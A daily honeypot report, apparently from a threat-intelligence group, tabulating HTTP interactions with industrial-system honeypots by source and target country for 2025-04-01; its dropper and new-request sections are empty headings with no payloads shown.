Report: 2025-04-01

Author
Shoggoth Industries
Daily Report: 2025-04-01

Interaction report on the HTTP service of various honeypots around the world.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| US | Germany |
| ID | Germany |
| US | Germany |
| DE | Germany |
| US | Germany |
| US | Dubai |
| CN | Georgia |
| GB | |

botnet_dropper_behaviour

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).


request

List of the day's requests that had never been detected before; requests that had already been detected are archived in the request database.


country_iso_code

List of countries and the number of requests received from IPs located in these countries.

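| | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 1835 | NL |
| 1 | 402 | US |
| 2 | 261 | HK |
| 3 | 174 | BG |
| 4 | 163 | DE |
| 5 | 162 | FR |
| 6 | 137 | TW |
| 7 | 93 | GB |
| 8 | 86 | CN |
| 9 | 60 | RU |
| 10 | 52 | PL |
| 11 | 51 | SC |
| 12 | 50 | BR |
| 13 | 34 | UA |
| 14 | 32 | CA |
| 15 | 29 | IN |
| 16 | 22 | PT |
| 17 | 19 | JP |
| 18 | 11 | GH |
| 19 | 10 | NG |
| 20 | 9 | KR |
| 21 | 9 | CH |
| 22 | 8 | AZ |
| 23 | 7 | BE |
| 24 | 6 | ID |
| 25 | 6 | MY |
| 26 | 6 | IT |
| 27 | 4 | MN |
| 28 | 4 | AU |
| 29 | 3 | SG |
| 30 | 3 | IL |
| 31 | 3 | VN |
| 32 | 2 | IR |
| 33 | 2 | IE |
| 34 | 2 | TH |
| 35 | 2 | RO |
| 36 | 1 | MC |
| 37 | 1 | ES |
| 38 | 1 | NO |
| 39 | 1 | AO |
| 40 | 1 | CZ |
| 41 | 1 | AE |
| 42 | 1 | DK |
| 43 | 1 | SE |
| 44 | 1 | KH |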
